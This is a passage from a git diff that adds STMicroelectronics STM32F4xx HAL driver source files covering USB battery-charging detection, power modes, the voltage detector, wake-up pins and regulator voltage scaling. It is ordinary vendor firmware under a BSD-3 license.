(USE_HAL_PCD_REGISTER_CALLBACKS == 1U) + hpcd->BCDCallback(hpcd, PCD_BCD_DISCOVERY_COMPLETED); +#else + HAL_PCDEx_BCD_Callback(hpcd, PCD_BCD_DISCOVERY_COMPLETED); +#endif /* USE_HAL_PCD_REGISTER_CALLBACKS */ +} + +/** + * @brief Activate BatteryCharging feature. + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCDEx_ActivateBCD(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + + USBx->GCCFG &= ~(USB_OTG_GCCFG_PDEN); + USBx->GCCFG &= ~(USB_OTG_GCCFG_SDEN); + + /* Power Down USB transceiver */ + USBx->GCCFG &= ~(USB_OTG_GCCFG_PWRDWN); + + /* Enable Battery charging */ + USBx->GCCFG |= USB_OTG_GCCFG_BCDEN; + + hpcd->battery_charging_active = 1U; + + return HAL_OK; +} + +/** + * @brief Deactivate BatteryCharging feature. + * @param hpcd PCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PCDEx_DeActivateBCD(PCD_HandleTypeDef *hpcd) +{ + USB_OTG_GlobalTypeDef *USBx = hpcd->Instance; + + USBx->GCCFG &= ~(USB_OTG_GCCFG_SDEN); + USBx->GCCFG &= ~(USB_OTG_GCCFG_PDEN); + + /* Disable Battery charging */ + USBx->GCCFG &= ~(USB_OTG_GCCFG_BCDEN); + + hpcd->battery_charging_active = 0U; + + return HAL_OK; +} +#endif /* defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) */ +#endif /* defined (USB_OTG_FS) || defined (USB_OTG_HS) */ + +/** + * @brief Send LPM message to user layer callback. + * @param hpcd PCD handle + * @param msg LPM message + * @retval HAL status + */ +__weak void HAL_PCDEx_LPM_Callback(PCD_HandleTypeDef *hpcd, PCD_LPM_MsgTypeDef msg) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + UNUSED(msg); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCDEx_LPM_Callback could be implemented in the user file + */ +} + +/** + * @brief Send BatteryCharging message to user layer callback. + * @param hpcd PCD handle + * @param msg LPM message + * @retval HAL status + */ +__weak void HAL_PCDEx_BCD_Callback(PCD_HandleTypeDef *hpcd, PCD_BCD_MsgTypeDef msg) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hpcd); + UNUSED(msg); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_PCDEx_BCD_Callback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** + * @} + */ +#endif /* defined (USB_OTG_FS) || defined (USB_OTG_HS) */ +#endif /* HAL_PCD_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pwr.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pwr.c new file mode 100644 index 000000000..5359d69b0 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pwr.c @@ -0,0 +1,576 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_pwr.c + * @author MCD Application Team + * @brief PWR HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Power Controller (PWR) peripheral: + * + Initialization and de-initialization functions + * + Peripheral Control functions + * + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup PWR PWR + * @brief PWR HAL module driver + * @{ + */ + +#ifdef HAL_PWR_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup PWR_Private_Constants + * @{ + */ + +/** @defgroup PWR_PVD_Mode_Mask PWR PVD Mode Mask + * @{ + */ +#define PVD_MODE_IT 0x00010000U +#define PVD_MODE_EVT 0x00020000U +#define PVD_RISING_EDGE 0x00000001U +#define PVD_FALLING_EDGE 0x00000002U +/** + * @} + */ + +/** + * @} + */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ + +/** @defgroup PWR_Exported_Functions PWR Exported Functions + * @{ + */ + +/** @defgroup PWR_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and de-initialization functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] + After reset, the backup domain (RTC registers, RTC backup data + registers and backup SRAM) is protected against possible unwanted + write accesses. + To enable access to the RTC Domain and RTC registers, proceed as follows: + (+) Enable the Power Controller (PWR) APB1 interface clock using the + __HAL_RCC_PWR_CLK_ENABLE() macro. + (+) Enable access to RTC domain using the HAL_PWR_EnableBkUpAccess() function. + +@endverbatim + * @{ + */ + +/** + * @brief Deinitializes the HAL PWR peripheral registers to their default reset values. + * @retval None + */ +void HAL_PWR_DeInit(void) +{ + __HAL_RCC_PWR_FORCE_RESET(); + __HAL_RCC_PWR_RELEASE_RESET(); +} + +/** + * @brief Enables access to the backup domain (RTC registers, RTC + * backup data registers and backup SRAM). + * @note If the HSE divided by 2, 3, ..31 is used as the RTC clock, the + * Backup Domain Access should be kept enabled. + * @note The following sequence is required to bypass the delay between + * DBP bit programming and the effective enabling of the backup domain. + * Please check the Errata Sheet for more details under "Possible delay + * in backup domain protection disabling/enabling after programming the + * DBP bit" section. + * @retval None + */ +void HAL_PWR_EnableBkUpAccess(void) +{ + __IO uint32_t dummyread; + *(__IO uint32_t *) CR_DBP_BB = (uint32_t)ENABLE; + dummyread = PWR->CR; + UNUSED(dummyread); +} + +/** + * @brief Disables access to the backup domain (RTC registers, RTC + * backup data registers and backup SRAM). + * @note If the HSE divided by 2, 3, ..31 is used as the RTC clock, the + * Backup Domain Access should be kept enabled. + * @note The following sequence is required to bypass the delay between + * DBP bit programming and the effective disabling of the backup domain. + * Please check the Errata Sheet for more details under "Possible delay + * in backup domain protection disabling/enabling after programming the + * DBP bit" section. + * @retval None + */ +void HAL_PWR_DisableBkUpAccess(void) +{ + __IO uint32_t dummyread; + *(__IO uint32_t *) CR_DBP_BB = (uint32_t)DISABLE; + dummyread = PWR->CR; + UNUSED(dummyread); +} + +/** + * @} + */ + +/** @defgroup PWR_Exported_Functions_Group2 Peripheral Control functions + * @brief Low Power modes configuration functions + * +@verbatim + + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + + *** PVD configuration *** + ========================= + [..] + (+) The PVD is used to monitor the VDD power supply by comparing it to a + threshold selected by the PVD Level (PLS[2:0] bits in the PWR_CR). + (+) A PVDO flag is available to indicate if VDD/VDDA is higher or lower + than the PVD threshold. This event is internally connected to the EXTI + line16 and can generate an interrupt if enabled. This is done through + __HAL_PWR_PVD_EXTI_ENABLE_IT() macro. + (+) The PVD is stopped in Standby mode. + + *** Wake-up pin configuration *** + ================================ + [..] + (+) Wake-up pin is used to wake up the system from Standby mode. This pin is + forced in input pull-down configuration and is active on rising edges. + (+) There is one Wake-up pin: Wake-up Pin 1 on PA.00. + (++) For STM32F446xx there are two Wake-Up pins: Pin1 on PA.00 and Pin2 on PC.13 + (++) For STM32F410xx/STM32F412xx/STM32F413xx/STM32F423xx there are three Wake-Up pins: Pin1 on PA.00, Pin2 on PC.00 and Pin3 on PC.01 + + *** Low Power modes configuration *** + ===================================== + [..] + The devices feature 3 low-power modes: + (+) Sleep mode: Cortex-M4 core stopped, peripherals kept running. + (+) Stop mode: all clocks are stopped, regulator running, regulator + in low power mode + (+) Standby mode: 1.2V domain powered off. + + *** Sleep mode *** + ================== + [..] + (+) Entry: + The Sleep mode is entered by using the HAL_PWR_EnterSLEEPMode(PWR_MAINREGULATOR_ON, PWR_SLEEPENTRY_WFI) + functions with + (++) PWR_SLEEPENTRY_WFI: enter SLEEP mode with WFI instruction + (++) PWR_SLEEPENTRY_WFE: enter SLEEP mode with WFE instruction + + -@@- The Regulator parameter is not used for the STM32F4 family + and is kept as parameter just to maintain compatibility with the + lower power families (STM32L). + (+) Exit: + Any peripheral interrupt acknowledged by the nested vectored interrupt + controller (NVIC) can wake up the device from Sleep mode. + + *** Stop mode *** + ================= + [..] + In Stop mode, all clocks in the 1.2V domain are stopped, the PLL, the HSI, + and the HSE RC oscillators are disabled. Internal SRAM and register contents + are preserved. + The voltage regulator can be configured either in normal or low-power mode. + To minimize the consumption In Stop mode, FLASH can be powered off before + entering the Stop mode using the HAL_PWREx_EnableFlashPowerDown() function. + It can be switched on again by software after exiting the Stop mode using + the HAL_PWREx_DisableFlashPowerDown() function. + + (+) Entry: + The Stop mode is entered using the HAL_PWR_EnterSTOPMode(PWR_MAINREGULATOR_ON) + function with: + (++) Main regulator ON. + (++) Low Power regulator ON. + (+) Exit: + Any EXTI Line (Internal or External) configured in Interrupt/Event mode. + + *** Standby mode *** + ==================== + [..] + (+) + The Standby mode allows to achieve the lowest power consumption. It is based + on the Cortex-M4 deep sleep mode, with the voltage regulator disabled. + The 1.2V domain is consequently powered off. The PLL, the HSI oscillator and + the HSE oscillator are also switched off. SRAM and register contents are lost + except for the RTC registers, RTC backup registers, backup SRAM and Standby + circuitry. + + The voltage regulator is OFF. + + (++) Entry: + (+++) The Standby mode is entered using the HAL_PWR_EnterSTANDBYMode() function. + (++) Exit: + (+++) WKUP pin rising edge, RTC alarm (Alarm A and Alarm B), RTC wake-up, + tamper event, time-stamp event, external reset in NRST pin, IWDG reset. + + *** Auto-wake-up (AWU) from low-power mode *** + ============================================= + [..] + + (+) The MCU can be woken up from low-power mode by an RTC Alarm event, an RTC + Wake-up event, a tamper event or a time-stamp event, without depending on + an external interrupt (Auto-wake-up mode). + + (+) RTC auto-wake-up (AWU) from the Stop and Standby modes + + (++) To wake up from the Stop mode with an RTC alarm event, it is necessary to + configure the RTC to generate the RTC alarm using the HAL_RTC_SetAlarm_IT() function. + + (++) To wake up from the Stop mode with an RTC Tamper or time stamp event, it + is necessary to configure the RTC to detect the tamper or time stamp event using the + HAL_RTCEx_SetTimeStamp_IT() or HAL_RTCEx_SetTamper_IT() functions. + + (++) To wake up from the Stop mode with an RTC Wake-up event, it is necessary to + configure the RTC to generate the RTC Wake-up event using the HAL_RTCEx_SetWakeUpTimer_IT() function. + +@endverbatim + * @{ + */ + +/** + * @brief Configures the voltage threshold detected by the Power Voltage Detector(PVD). + * @param sConfigPVD pointer to an PWR_PVDTypeDef structure that contains the configuration + * information for the PVD. + * @note Refer to the electrical characteristics of your device datasheet for + * more details about the voltage threshold corresponding to each + * detection level. + * @retval None + */ +void HAL_PWR_ConfigPVD(PWR_PVDTypeDef *sConfigPVD) +{ + /* Check the parameters */ + assert_param(IS_PWR_PVD_LEVEL(sConfigPVD->PVDLevel)); + assert_param(IS_PWR_PVD_MODE(sConfigPVD->Mode)); + + /* Set PLS[7:5] bits according to PVDLevel value */ + MODIFY_REG(PWR->CR, PWR_CR_PLS, sConfigPVD->PVDLevel); + + /* Clear any previous config. Keep it clear if no event or IT mode is selected */ + __HAL_PWR_PVD_EXTI_DISABLE_EVENT(); + __HAL_PWR_PVD_EXTI_DISABLE_IT(); + __HAL_PWR_PVD_EXTI_DISABLE_RISING_EDGE(); + __HAL_PWR_PVD_EXTI_DISABLE_FALLING_EDGE(); + + /* Configure interrupt mode */ + if((sConfigPVD->Mode & PVD_MODE_IT) == PVD_MODE_IT) + { + __HAL_PWR_PVD_EXTI_ENABLE_IT(); + } + + /* Configure event mode */ + if((sConfigPVD->Mode & PVD_MODE_EVT) == PVD_MODE_EVT) + { + __HAL_PWR_PVD_EXTI_ENABLE_EVENT(); + } + + /* Configure the edge */ + if((sConfigPVD->Mode & PVD_RISING_EDGE) == PVD_RISING_EDGE) + { + __HAL_PWR_PVD_EXTI_ENABLE_RISING_EDGE(); + } + + if((sConfigPVD->Mode & PVD_FALLING_EDGE) == PVD_FALLING_EDGE) + { + __HAL_PWR_PVD_EXTI_ENABLE_FALLING_EDGE(); + } +} + +/** + * @brief Enables the Power Voltage Detector(PVD). + * @retval None + */ +void HAL_PWR_EnablePVD(void) +{ + *(__IO uint32_t *) CR_PVDE_BB = (uint32_t)ENABLE; +} + +/** + * @brief Disables the Power Voltage Detector(PVD). + * @retval None + */ +void HAL_PWR_DisablePVD(void) +{ + *(__IO uint32_t *) CR_PVDE_BB = (uint32_t)DISABLE; +} + +/** + * @brief Enables the Wake-up PINx functionality. + * @param WakeUpPinx Specifies the Power Wake-Up pin to enable. + * This parameter can be one of the following values: + * @arg PWR_WAKEUP_PIN1 + * @arg PWR_WAKEUP_PIN2 available only on STM32F410xx/STM32F446xx/STM32F412xx/STM32F413xx/STM32F423xx devices + * @arg PWR_WAKEUP_PIN3 available only on STM32F410xx/STM32F412xx/STM32F413xx/STM32F423xx devices + * @retval None + */ +void HAL_PWR_EnableWakeUpPin(uint32_t WakeUpPinx) +{ + /* Check the parameter */ + assert_param(IS_PWR_WAKEUP_PIN(WakeUpPinx)); + + /* Enable the wake up pin */ + SET_BIT(PWR->CSR, WakeUpPinx); +} + +/** + * @brief Disables the Wake-up PINx functionality. + * @param WakeUpPinx Specifies the Power Wake-Up pin to disable. + * This parameter can be one of the following values: + * @arg PWR_WAKEUP_PIN1 + * @arg PWR_WAKEUP_PIN2 available only on STM32F410xx/STM32F446xx/STM32F412xx/STM32F413xx/STM32F423xx devices + * @arg PWR_WAKEUP_PIN3 available only on STM32F410xx/STM32F412xx/STM32F413xx/STM32F423xx devices + * @retval None + */ +void HAL_PWR_DisableWakeUpPin(uint32_t WakeUpPinx) +{ + /* Check the parameter */ + assert_param(IS_PWR_WAKEUP_PIN(WakeUpPinx)); + + /* Disable the wake up pin */ + CLEAR_BIT(PWR->CSR, WakeUpPinx); +} + +/** + * @brief Enters Sleep mode. + * + * @note In Sleep mode, all I/O pins keep the same state as in Run mode. + * + * @note In Sleep mode, the systick is stopped to avoid exit from this mode with + * systick interrupt when used as time base for Timeout + * + * @param Regulator Specifies the regulator state in SLEEP mode. + * This parameter can be one of the following values: + * @arg PWR_MAINREGULATOR_ON: SLEEP mode with regulator ON + * @arg PWR_LOWPOWERREGULATOR_ON: SLEEP mode with low power regulator ON + * @note This parameter is not used for the STM32F4 family and is kept as parameter + * just to maintain compatibility with the lower power families. + * @param SLEEPEntry Specifies if SLEEP mode in entered with WFI or WFE instruction. + * This parameter can be one of the following values: + * @arg PWR_SLEEPENTRY_WFI: enter SLEEP mode with WFI instruction + * @arg PWR_SLEEPENTRY_WFE: enter SLEEP mode with WFE instruction + * @retval None + */ +void HAL_PWR_EnterSLEEPMode(uint32_t Regulator, uint8_t SLEEPEntry) +{ + /* Check the parameters */ + assert_param(IS_PWR_REGULATOR(Regulator)); + assert_param(IS_PWR_SLEEP_ENTRY(SLEEPEntry)); + UNUSED(Regulator); + + /* Clear SLEEPDEEP bit of Cortex System Control Register */ + CLEAR_BIT(SCB->SCR, ((uint32_t)SCB_SCR_SLEEPDEEP_Msk)); + + /* Select SLEEP mode entry -------------------------------------------------*/ + if(SLEEPEntry == PWR_SLEEPENTRY_WFI) + { + /* Request Wait For Interrupt */ + __WFI(); + } + else + { + /* Request Wait For Event */ + __SEV(); + __WFE(); + __WFE(); + } +} + +/** + * @brief Enters Stop mode. + * @note In Stop mode, all I/O pins keep the same state as in Run mode. + * @note When exiting Stop mode by issuing an interrupt or a wake-up event, + * the HSI RC oscillator is selected as system clock. + * @note When the voltage regulator operates in low power mode, an additional + * startup delay is incurred when waking up from Stop mode. + * By keeping the internal regulator ON during Stop mode, the consumption + * is higher although the startup time is reduced. + * @param Regulator Specifies the regulator state in Stop mode. + * This parameter can be one of the following values: + * @arg PWR_MAINREGULATOR_ON: Stop mode with regulator ON + * @arg PWR_LOWPOWERREGULATOR_ON: Stop mode with low power regulator ON + * @param STOPEntry Specifies if Stop mode in entered with WFI or WFE instruction. + * This parameter can be one of the following values: + * @arg PWR_STOPENTRY_WFI: Enter Stop mode with WFI instruction + * @arg PWR_STOPENTRY_WFE: Enter Stop mode with WFE instruction + * @retval None + */ +void HAL_PWR_EnterSTOPMode(uint32_t Regulator, uint8_t STOPEntry) +{ + /* Check the parameters */ + assert_param(IS_PWR_REGULATOR(Regulator)); + assert_param(IS_PWR_STOP_ENTRY(STOPEntry)); + + /* Select the regulator state in Stop mode: Set PDDS and LPDS bits according to PWR_Regulator value */ + MODIFY_REG(PWR->CR, (PWR_CR_PDDS | PWR_CR_LPDS), Regulator); + + /* Set SLEEPDEEP bit of Cortex System Control Register */ + SET_BIT(SCB->SCR, ((uint32_t)SCB_SCR_SLEEPDEEP_Msk)); + + /* Select Stop mode entry --------------------------------------------------*/ + if(STOPEntry == PWR_STOPENTRY_WFI) + { + /* Request Wait For Interrupt */ + __WFI(); + } + else + { + /* Request Wait For Event */ + __SEV(); + __WFE(); + __WFE(); + } + /* Reset SLEEPDEEP bit of Cortex System Control Register */ + CLEAR_BIT(SCB->SCR, ((uint32_t)SCB_SCR_SLEEPDEEP_Msk)); +} + +/** + * @brief Enters Standby mode. + * @note In Standby mode, all I/O pins are high impedance except for: + * - Reset pad (still available) + * - RTC_AF1 pin (PC13) if configured for tamper, time-stamp, RTC + * Alarm out, or RTC clock calibration out. + * - RTC_AF2 pin (PI8) if configured for tamper or time-stamp. + * - WKUP pin 1 (PA0) if enabled. + * @retval None + */ +void HAL_PWR_EnterSTANDBYMode(void) +{ + /* Select Standby mode */ + SET_BIT(PWR->CR, PWR_CR_PDDS); + + /* Set SLEEPDEEP bit of Cortex System Control Register */ + SET_BIT(SCB->SCR, ((uint32_t)SCB_SCR_SLEEPDEEP_Msk)); + + /* This option is used to ensure that store operations are completed */ +#if defined ( __CC_ARM) + __force_stores(); +#endif + /* Request Wait For Interrupt */ + __WFI(); +} + +/** + * @brief This function handles the PWR PVD interrupt request. + * @note This API should be called under the PVD_IRQHandler(). + * @retval None + */ +void HAL_PWR_PVD_IRQHandler(void) +{ + /* Check PWR Exti flag */ + if(__HAL_PWR_PVD_EXTI_GET_FLAG() != RESET) + { + /* PWR PVD interrupt user callback */ + HAL_PWR_PVDCallback(); + + /* Clear PWR Exti pending bit */ + __HAL_PWR_PVD_EXTI_CLEAR_FLAG(); + } +} + +/** + * @brief PWR PVD interrupt callback + * @retval None + */ +__weak void HAL_PWR_PVDCallback(void) +{ + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_PWR_PVDCallback could be implemented in the user file + */ +} + +/** + * @brief Indicates Sleep-On-Exit when returning from Handler mode to Thread mode. + * @note Set SLEEPONEXIT bit of SCR register. When this bit is set, the processor + * re-enters SLEEP mode when an interruption handling is over. + * Setting this bit is useful when the processor is expected to run only on + * interruptions handling. + * @retval None + */ +void HAL_PWR_EnableSleepOnExit(void) +{ + /* Set SLEEPONEXIT bit of Cortex System Control Register */ + SET_BIT(SCB->SCR, ((uint32_t)SCB_SCR_SLEEPONEXIT_Msk)); +} + +/** + * @brief Disables Sleep-On-Exit feature when returning from Handler mode to Thread mode. + * @note Clears SLEEPONEXIT bit of SCR register. When this bit is set, the processor + * re-enters SLEEP mode when an interruption handling is over. + * @retval None + */ +void HAL_PWR_DisableSleepOnExit(void) +{ + /* Clear SLEEPONEXIT bit of Cortex System Control Register */ + CLEAR_BIT(SCB->SCR, ((uint32_t)SCB_SCR_SLEEPONEXIT_Msk)); +} + +/** + * @brief Enables CORTEX M4 SEVONPEND bit. + * @note Sets SEVONPEND bit of SCR register. When this bit is set, this causes + * WFE to wake up when an interrupt moves from inactive to pended. + * @retval None + */ +void HAL_PWR_EnableSEVOnPend(void) +{ + /* Set SEVONPEND bit of Cortex System Control Register */ + SET_BIT(SCB->SCR, ((uint32_t)SCB_SCR_SEVONPEND_Msk)); +} + +/** + * @brief Disables CORTEX M4 SEVONPEND bit. + * @note Clears SEVONPEND bit of SCR register. When this bit is set, this causes + * WFE to wake up when an interrupt moves from inactive to pended. + * @retval None + */ +void HAL_PWR_DisableSEVOnPend(void) +{ + /* Clear SEVONPEND bit of Cortex System Control Register */ + CLEAR_BIT(SCB->SCR, ((uint32_t)SCB_SCR_SEVONPEND_Msk)); +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_PWR_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pwr_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pwr_ex.c new file mode 100644 index 000000000..0d26083a4 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_pwr_ex.c @@ -0,0 +1,604 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_pwr_ex.c + * @author MCD Application Team + * @brief Extended PWR HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of PWR extension peripheral: + * + Peripheral Extended features functions + * + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup PWREx PWREx + * @brief PWR HAL module driver + * @{ + */ + +#ifdef HAL_PWR_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup PWREx_Private_Constants + * @{ + */ +#define PWR_OVERDRIVE_TIMEOUT_VALUE 1000U +#define PWR_UDERDRIVE_TIMEOUT_VALUE 1000U +#define PWR_BKPREG_TIMEOUT_VALUE 1000U +#define PWR_VOSRDY_TIMEOUT_VALUE 1000U +/** + * @} + */ + + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/** @defgroup PWREx_Exported_Functions PWREx Exported Functions + * @{ + */ + +/** @defgroup PWREx_Exported_Functions_Group1 Peripheral Extended features functions + * @brief Peripheral Extended features functions + * +@verbatim + + =============================================================================== + ##### Peripheral extended features functions ##### + =============================================================================== + + *** Main and Backup Regulators configuration *** + ================================================ + [..] + (+) The backup domain includes 4 Kbytes of backup SRAM accessible only from + the CPU, and address in 32-bit, 16-bit or 8-bit mode. Its content is + retained even in Standby or VBAT mode when the low power backup regulator + is enabled. It can be considered as an internal EEPROM when VBAT is + always present. You can use the HAL_PWREx_EnableBkUpReg() function to + enable the low power backup regulator. + + (+) When the backup domain is supplied by VDD (analog switch connected to VDD) + the backup SRAM is powered from VDD which replaces the VBAT power supply to + save battery life. + + (+) The backup SRAM is not mass erased by a tamper event. It is read + protected to prevent confidential data, such as cryptographic private + key, from being accessed. The backup SRAM can be erased only through + the Flash interface when a protection level change from level 1 to + level 0 is requested. + -@- Refer to the description of Read protection (RDP) in the Flash + programming manual. + + (+) The main internal regulator can be configured to have a tradeoff between + performance and power consumption when the device does not operate at + the maximum frequency. This is done through __HAL_PWR_MAINREGULATORMODE_CONFIG() + macro which configure VOS bit in PWR_CR register + + Refer to the product datasheets for more details. + + *** FLASH Power Down configuration **** + ======================================= + [..] + (+) By setting the FPDS bit in the PWR_CR register by using the + HAL_PWREx_EnableFlashPowerDown() function, the Flash memory also enters power + down mode when the device enters Stop mode. When the Flash memory + is in power down mode, an additional startup delay is incurred when + waking up from Stop mode. + + (+) For STM32F42xxx/43xxx/446xx/469xx/479xx Devices, the scale can be modified only when the PLL + is OFF and the HSI or HSE clock source is selected as system clock. + The new value programmed is active only when the PLL is ON. + When the PLL is OFF, the voltage scale 3 is automatically selected. + Refer to the datasheets for more details. + + *** Over-Drive and Under-Drive configuration **** + ================================================= + [..] + (+) For STM32F42xxx/43xxx/446xx/469xx/479xx Devices, in Run mode: the main regulator has + 2 operating modes available: + (++) Normal mode: The CPU and core logic operate at maximum frequency at a given + voltage scaling (scale 1, scale 2 or scale 3) + (++) Over-drive mode: This mode allows the CPU and the core logic to operate at a + higher frequency than the normal mode for a given voltage scaling (scale 1, + scale 2 or scale 3). This mode is enabled through HAL_PWREx_EnableOverDrive() function and + disabled by HAL_PWREx_DisableOverDrive() function, to enter or exit from Over-drive mode please follow + the sequence described in Reference manual. + + (+) For STM32F42xxx/43xxx/446xx/469xx/479xx Devices, in Stop mode: the main regulator or low power regulator + supplies a low power voltage to the 1.2V domain, thus preserving the content of registers + and internal SRAM. 2 operating modes are available: + (++) Normal mode: the 1.2V domain is preserved in nominal leakage mode. This mode is only + available when the main regulator or the low power regulator is used in Scale 3 or + low voltage mode. + (++) Under-drive mode: the 1.2V domain is preserved in reduced leakage mode. This mode is only + available when the main regulator or the low power regulator is in low voltage mode. + +@endverbatim + * @{ + */ + +/** + * @brief Enables the Backup Regulator. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PWREx_EnableBkUpReg(void) +{ + uint32_t tickstart = 0U; + + *(__IO uint32_t *) CSR_BRE_BB = (uint32_t)ENABLE; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till Backup regulator ready flag is set */ + while(__HAL_PWR_GET_FLAG(PWR_FLAG_BRR) == RESET) + { + if((HAL_GetTick() - tickstart ) > PWR_BKPREG_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + return HAL_OK; +} + +/** + * @brief Disables the Backup Regulator. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_PWREx_DisableBkUpReg(void) +{ + uint32_t tickstart = 0U; + + *(__IO uint32_t *) CSR_BRE_BB = (uint32_t)DISABLE; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till Backup regulator ready flag is set */ + while(__HAL_PWR_GET_FLAG(PWR_FLAG_BRR) != RESET) + { + if((HAL_GetTick() - tickstart ) > PWR_BKPREG_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + return HAL_OK; +} + +/** + * @brief Enables the Flash Power Down in Stop mode. + * @retval None + */ +void HAL_PWREx_EnableFlashPowerDown(void) +{ + *(__IO uint32_t *) CR_FPDS_BB = (uint32_t)ENABLE; +} + +/** + * @brief Disables the Flash Power Down in Stop mode. + * @retval None + */ +void HAL_PWREx_DisableFlashPowerDown(void) +{ + *(__IO uint32_t *) CR_FPDS_BB = (uint32_t)DISABLE; +} + +/** + * @brief Return Voltage Scaling Range. + * @retval The configured scale for the regulator voltage(VOS bit field). + * The returned value can be one of the following: + * - @arg PWR_REGULATOR_VOLTAGE_SCALE1: Regulator voltage output Scale 1 mode + * - @arg PWR_REGULATOR_VOLTAGE_SCALE2: Regulator voltage output Scale 2 mode + * - @arg PWR_REGULATOR_VOLTAGE_SCALE3: Regulator voltage output Scale 3 mode + */ +uint32_t HAL_PWREx_GetVoltageRange(void) +{ + return (PWR->CR & PWR_CR_VOS); +} + +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) +/** + * @brief Configures the main internal regulator output voltage. + * @param VoltageScaling specifies the regulator output voltage to achieve + * a tradeoff between performance and power consumption. + * This parameter can be one of the following values: + * @arg PWR_REGULATOR_VOLTAGE_SCALE1: Regulator voltage output range 1 mode, + * the maximum value of fHCLK = 168 MHz. + * @arg PWR_REGULATOR_VOLTAGE_SCALE2: Regulator voltage output range 2 mode, + * the maximum value of fHCLK = 144 MHz. + * @note When moving from Range 1 to Range 2, the system frequency must be decreased to + * a value below 144 MHz before calling HAL_PWREx_ConfigVoltageScaling() API. + * When moving from Range 2 to Range 1, the system frequency can be increased to + * a value up to 168 MHz after calling HAL_PWREx_ConfigVoltageScaling() API. + * @retval HAL Status + */ +HAL_StatusTypeDef HAL_PWREx_ControlVoltageScaling(uint32_t VoltageScaling) +{ + uint32_t tickstart = 0U; + + assert_param(IS_PWR_VOLTAGE_SCALING_RANGE(VoltageScaling)); + + /* Enable PWR RCC Clock Peripheral */ + __HAL_RCC_PWR_CLK_ENABLE(); + + /* Set Range */ + __HAL_PWR_VOLTAGESCALING_CONFIG(VoltageScaling); + + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + while((__HAL_PWR_GET_FLAG(PWR_FLAG_VOSRDY) == RESET)) + { + if((HAL_GetTick() - tickstart ) > PWR_VOSRDY_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + return HAL_OK; +} + +#elif defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) || \ + defined(STM32F401xC) || defined(STM32F401xE) || defined(STM32F410Tx) || defined(STM32F410Cx) || \ + defined(STM32F410Rx) || defined(STM32F411xE) || defined(STM32F446xx) || defined(STM32F469xx) || \ + defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || \ + defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) +/** + * @brief Configures the main internal regulator output voltage. + * @param VoltageScaling specifies the regulator output voltage to achieve + * a tradeoff between performance and power consumption. + * This parameter can be one of the following values: + * @arg PWR_REGULATOR_VOLTAGE_SCALE1: Regulator voltage output range 